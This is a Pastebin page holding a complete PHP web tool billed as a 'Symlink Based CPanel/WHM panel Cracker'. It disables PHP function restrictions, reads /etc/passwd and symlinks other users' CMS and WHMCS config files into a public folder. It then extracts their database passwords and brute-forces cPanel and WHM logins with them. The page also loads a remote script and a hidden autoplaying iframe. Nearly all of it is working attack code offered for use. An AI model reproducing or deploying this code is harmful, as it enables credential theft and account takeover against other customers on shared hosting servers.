API tools faq
paste
P22DX

whm/cPanel cracker

P22DX
Sep 27th, 2017
285
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.47 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $head = '
  4. <script src="//yourjavascript.com/1171704334/efek-salju-faisal.js"></script>
  5. <html>
  6. <iframe width="0" height="0" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https://api.soundcloud.com/tracks/333261487&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=false&amp;show_reposts=false&amp;visual=true"></iframe>
  7. <head>
  8. </script>
  9. <title>Symlink Based CPanel/WHM panel Cracker</title>
  10.  
  11. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  12.  
  13. <STYLE>
  14. body {
  15. font-family: Tahoma
  16. }
  17. tr {
  18. BORDER: dashed 1px #333;
  19. color: #FFF;
  20. }
  21. td {
  22. BORDER: dashed 1px #333;
  23. color: #FFF;
  24. }
  25. .table1 {
  26. BORDER: 0px Black;
  27. BACKGROUND-COLOR: Black;
  28. color: #FFF;
  29. }
  30. .td1 {
  31. BORDER: 0px;
  32. BORDER-COLOR: #333333;
  33. font: 7pt Verdana;
  34. color: Green;
  35. }
  36. .tr1 {
  37. BORDER: 0px;
  38. BORDER-COLOR: #333333;
  39. color: #FFF;
  40. }
  41. table {
  42. BORDER: dashed 1px #333;
  43. BORDER-COLOR: #333333;
  44. BACKGROUND-COLOR: Black;
  45. color: #FFF;
  46. }
  47. input {
  48. border : solid 3px ;
  49. border-color : #333;
  50. BACKGROUND-COLOR: white;
  51. font: 11pt Verdana;
  52. color: #333;
  53. }
  54. select {
  55. BORDER-RIGHT: Black 1px solid;
  56. BORDER-TOP: #DF0000 1px solid;
  57. BORDER-LEFT: #DF0000 1px solid;
  58. BORDER-BOTTOM: Black 1px solid;
  59. BORDER-color: #FFF;
  60. BACKGROUND-COLOR: Black;
  61. font: 8pt Verdana;
  62. color: Red;
  63. }
  64. submit {
  65. BORDER: buttonhighlight 2px outset;
  66. BACKGROUND-COLOR: Black;
  67. width: 30%;
  68. color: #FFF;
  69. }
  70. textarea {
  71. border : dashed 1px #333;
  72. BACKGROUND-COLOR: Black;
  73. font: Fixedsys bold;
  74. color: #999;
  75. }
  76. BODY {
  77. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  78. margin: 1px;
  79. color: Red;
  80. background-color: Black;
  81. }
  82. .main {
  83. margin : -287px 0px 0px -490px;
  84. BORDER: dashed 1px #333;
  85. BORDER-COLOR: #333333;
  86. }
  87. .tt {
  88. background-color: Black;
  89. }
  90.  
  91. A:link {
  92. COLOR: White; TEXT-DECORATION: none
  93. }
  94. A:visited {
  95. COLOR: White; TEXT-DECORATION: none
  96. }
  97. A:hover {
  98. color: Red; TEXT-DECORATION: none
  99. }
  100. A:active {
  101. color: Red; TEXT-DECORATION: none
  102. }
  103. </STYLE>
  104. <script language=\'javascript\'>
  105. function hide_div(id)
  106. {
  107. document.getElementById(id).style.display = \'none\';
  108. document.cookie=id+\'=0;\';
  109. }
  110. function show_div(id)
  111. {
  112. document.getElementById(id).style.display = \'block\';
  113. document.cookie=id+\'=1;\';
  114. }
  115. function change_divst(id)
  116. {
  117. if (document.getElementById(id).style.display == \'none\')
  118. show_div(id);
  119. else
  120. hide_div(id);
  121. }
  122. </script>'; ?>
  123. <html>
  124. <head>
  125.  
  126. <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png"><center>
  127. <a href="#"> <img src="http://marvelmedilinks.com/Cvar.png" border="0"></center></a>
  128. <h2><center>Symlink Based CPanel/WHM panel Cracker <br />
  129. <a style='color:lime; text-decoration:none;'
  130. href=http://Cvar1984.Sarahah.com>Feedback</a></center></h2>
  131. <?php
  132. echo $head ;
  133. echo '
  134.  
  135. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  136.  
  137. </td></tr><tr><td
  138. width="100%" align="center" valign="top" rowspan="1"><font
  139. color="red" face="arial"size="1"><b>
  140.  
  141. ';
  142.  
  143. ?>
  144. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="arial">
  145. <form method=post>
  146. <input type=submit name=ini value="Generate PHP.ini" /></form>
  147. <?php
  148. if(isset($_POST['ini']))
  149. {
  150.  
  151. $r=fopen('php.ini','w');
  152. $rr=" disable_functions=none ";
  153. fwrite($r,$rr);
  154. $link="<a href=php.ini><font color=white size=2 face=\"arial\"><u>link to php.ini file</u></font></a>";
  155. echo $link;
  156.  
  157. }
  158. ?>
  159. <?php
  160.  
  161. ?>
  162. <form method=post>
  163. <input type=submit name="usre" value="Extract Usernames" /></form>
  164.  
  165.  
  166.  
  167.  
  168. <?php
  169. if(isset($_POST['usre'])){
  170. ?><form method=post>
  171. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  172. foreach($users as $user)
  173. {
  174. $str=explode(":",$user);
  175. echo $str[0]."\n";
  176. }
  177.  
  178. ?></textarea><br><br>
  179. <input type=submit name=su value="Start" /></form>
  180. <?php } ?>
  181. <?php
  182. error_reporting(0);
  183. echo "<font color=red size=2 face=\"arial\">";
  184. if(isset($_POST['su']))
  185. {
  186.  
  187. $dir=mkdir('BT',0777);
  188. $r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any";
  189. $f = fopen('BT/.htaccess','w');
  190.  
  191. fwrite($f,$r);
  192. $consym="<a href=BT/><font color=white size=3 face=\"arial\">Configuration files</font></a>";
  193. echo "<br>Folder Where Config Files has been Symlinked<br><u><font color=red size=2 face=\"arial\">$consym</font></u>";
  194.  
  195. $usr=explode("\n",$_POST['user']);
  196.  
  197. foreach($usr as $uss )
  198. {
  199. $us=trim($uss);
  200.  
  201. $r="BT/";
  202. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  203. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  204. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  205. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  206. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  207. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  208. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  209. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  210. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  211. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  212. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  213. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  214. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  215. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  216. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  217. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  218. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  219. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  220. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  221. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  222. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  223. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  224. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  225. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  226. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  227. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  228. }
  229. }
  230. ?>
  231. <?php
  232.  
  233. ?>
  234.  
  235. <form method=post>
  236. <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
  237. <?php
  238. error_reporting(0);
  239. set_time_limit(0);
  240. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  241. {
  242.  
  243. $ar0=explode($marqueurDebutLien, $text);
  244. $ar1=explode($marqueurFinLien, $ar0[1]);
  245. $ar=trim($ar1[0]);
  246. return $ar;
  247. }
  248.  
  249. if(isset($_POST['sm']))
  250.  
  251. {
  252.  
  253. echo '<font color=green>OK++';
  254.  
  255. $ffile=fopen('BT.txt','a+');
  256.  
  257.  
  258. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/";
  259. $re=$r;
  260. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  261.  
  262. $users=file("/etc/passwd");
  263. foreach($users as $user)
  264. {
  265.  
  266. $str=explode(":",$user);
  267. $usersss=$str[0];
  268. foreach($confi as $co)
  269. {
  270.  
  271.  
  272. $uurl=$re.$usersss.$co;
  273. $uel=$uurl;
  274.  
  275. $ch = curl_init();
  276.  
  277. curl_setopt($ch, CURLOPT_URL, $uel);
  278. curl_setopt($ch, CURLOPT_HEADER, 1);
  279. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  280. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  281. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  282. $result['EXE'] = curl_exec($ch);
  283. curl_close($ch);
  284. $uxl=$result['EXE'];
  285.  
  286.  
  287. if($uxl && preg_match('/table_prefix/i',$uxl))
  288. {
  289.  
  290. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Wordpress </font></td></tr></table>";
  291.  
  292.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  293. if(!empty($dbp))
  294. $pass=$dbp."\n";
  295. fwrite($ffile,$pass);
  296.  
  297. }
  298. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  299. {
  300.  
  301. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Whmcs </font></td></tr></table>";
  302.  
  303. echo $dbp=entre2v2($uxl,"db_password = '","';");
  304. if(!empty($dbp))
  305. $pass=$dbp."\n";
  306. fwrite($ffile,$pass);
  307.  
  308. }
  309.  
  310.  
  311. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  312. {
  313.  
  314. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Joomla </font></td></tr></table>";
  315.  
  316. echo $db=entre2v2($uxl,"password = '","';");
  317. if(!empty($db))
  318. $pass=$db."\n";
  319. fwrite($ffile,$pass);
  320. }
  321. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  322. {
  323.  
  324. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is vbulletin </font></td></tr></table>";
  325.  
  326. echo $db=entre2v2($uxl,"password'] = '","';");
  327. if(!empty($db))
  328. $pass=$db."\n";
  329. fwrite($ffile,$pass);
  330.  
  331. }
  332. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  333. {
  334.  
  335. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  336.  
  337. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  338. if(!empty($db))
  339. $pass=$db."\n";
  340. fwrite($ffile,$pass);
  341. }
  342. elseif($uxl && preg_match('/dbpass/i',$uxl))
  343. {
  344.  
  345. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  346.  
  347. echo $db=entre2v2($uxl,"dbpass = '","';");
  348. if(!empty($db))
  349. $pass=$db."\n";
  350. fwrite($ffile,$pass);
  351. }
  352. elseif($uxl && preg_match('/dbpass/i',$uxl))
  353. {
  354.  
  355. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  356.  
  357. echo $db=entre2v2($uxl,"dbpass = '","';");
  358. if(!empty($db))
  359. $pass=$db."\n";
  360. fwrite($ffile,$pass);
  361.  
  362. }
  363. elseif($uxl && preg_match('/dbpass/i',$uxl))
  364. {
  365.  
  366. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  367.  
  368. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  369. if(!empty($db))
  370. $pass=$db."\n";
  371. fwrite($ffile,$pass);
  372. }
  373.  
  374.  
  375. }
  376. }
  377. }
  378. ?>
  379. <?php
  380.  
  381. ?>
  382.  
  383.  
  384. <form method=post>
  385. <input type=submit name=cpanel value="Auto CPanel/WHM panel cracker"><p>
  386. <?php
  387.  
  388. if(isset($_POST['cpanel']))
  389. {
  390. ?>
  391. <form method=post><div align=center><table>
  392. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  393. <option name="op" value="whm">WHMPanel</option></table><p>
  394. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  395. foreach($users as $user)
  396. {
  397. $str=explode(":",$user);
  398. echo $str[0]."\n";
  399. }
  400.  
  401. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  402. <?php
  403.  
  404. $d=getcwd()."/BT.txt";
  405. $pf=file($d);
  406. foreach($pf as $rt)
  407. {
  408. $str=explode('\n',$rt);
  409. echo trim($str[0])."\n";
  410. } ?></textarea><p>
  411. <input type=submit name=cpanelcracking value="Start"></form>
  412. <?php
  413. }
  414. ?>
  415.  
  416.  
  417.  
  418.  
  419. <?php
  420. error_reporting(0);
  421. $connect_timeout=5;
  422. set_time_limit(0);
  423.  
  424. $userl=$_POST['usernames'];
  425. $passl=$_POST['passwords'];
  426. $attack=$_POST['op'];
  427. $target = "localhost";
  428.  
  429. if(isset($_POST['cpanelcracking']))
  430. {
  431. if($userl!=="" && $passl!=="")
  432. {
  433. if($_POST["op"]=="cp")
  434. {
  435. $cracked=$_POST['crack'];
  436. @fopen($cracked,'a');
  437. echo "Attacking CPanel....please wait till the end of process \n";
  438.  
  439.  
  440. }
  441. elseif($_POST["op"]=="whm")
  442. {
  443. @fopen($cracked,'a');
  444. echo "Attacking WHM panel....please wait till the end of process";
  445.  
  446. }
  447.  
  448. function cpanel($host,$user,$pass,$timeout){
  449. $ch = curl_init();
  450. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  451. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  452. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  453. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  454. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  455. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  456. $data = curl_exec($ch);
  457. if ( curl_errno($ch) == 0 ){
  458. echo "<table width=100% ><tr><td align=center><b></font>
  459.  
  460. <font color=red size=2> Cracked </font>
  461.  
  462. <font color=white size=2> Username is </font>
  463.  
  464. <font color=green size=2> $user</font>
  465.  
  466. <font color=red size=2> & </font>
  467.  
  468. <font color=white size=2> Password is </font>
  469.  
  470. <font color=green size=2> $pass </font>
  471.  
  472. </font></b></td></tr></table>";
  473.  
  474. }
  475.  
  476. curl_close($ch);}
  477.  
  478. $userlist=explode("\n",$userl);
  479. $passlist=explode("\n",$passl);
  480.  
  481. if ($attack == "cp")
  482. {
  483. foreach ($userlist as $user) {
  484. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  485. $finaluser = trim($user);
  486. foreach ($passlist as $password ) {
  487. $finalpass = trim($password);
  488.  
  489.  
  490. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  491.  
  492. }
  493. }
  494.  
  495. }
  496.  
  497. function whm($host,$user,$pass,$timeout){
  498. $ch = curl_init();
  499. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  500. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  501. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  502. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  503. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  504. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  505. $data = curl_exec($ch);
  506. if ( curl_errno($ch) == 0 ){
  507. echo "<table width=100% ><tr><td align=center><b></font>
  508.  
  509. <font color=red size=2> Cracked </font>
  510.  
  511. <font color=white size=2> Username is </font>
  512.  
  513. <font color=green size=2> $user</font>
  514.  
  515. <font color=red size=2> & </font>
  516.  
  517. <font color=white size=2> Password is </font>
  518.  
  519. <font color=green size=2> $pass </font>
  520.  
  521. </font></b></td></tr></table>";
  522.  
  523.  
  524.  
  525.  
  526. }
  527.  
  528.  
  529. curl_close($ch);}
  530. $userlist=explode("\n",$userl);
  531. $passlist=explode("\n",$passl);
  532.  
  533. if ($attack == "whm")
  534. {
  535. foreach ($userlist as $user) {
  536. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
  537. $finaluser = trim($user);
  538. foreach ($passlist as $password ) {
  539. $finalpass = trim($password);
  540.  
  541. whm($target,$finaluser,$finalpass,$connect_timeout);
  542. }
  543. }
  544. }
  545. }
  546. elseif($userl=="")
  547. {
  548. echo "you have left userlist field empty";
  549.  
  550. }
  551. elseif($passl=="")
  552. {
  553.  
  554. echo "please put passwords in paasword list field";
  555. }
  556. }
  557. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!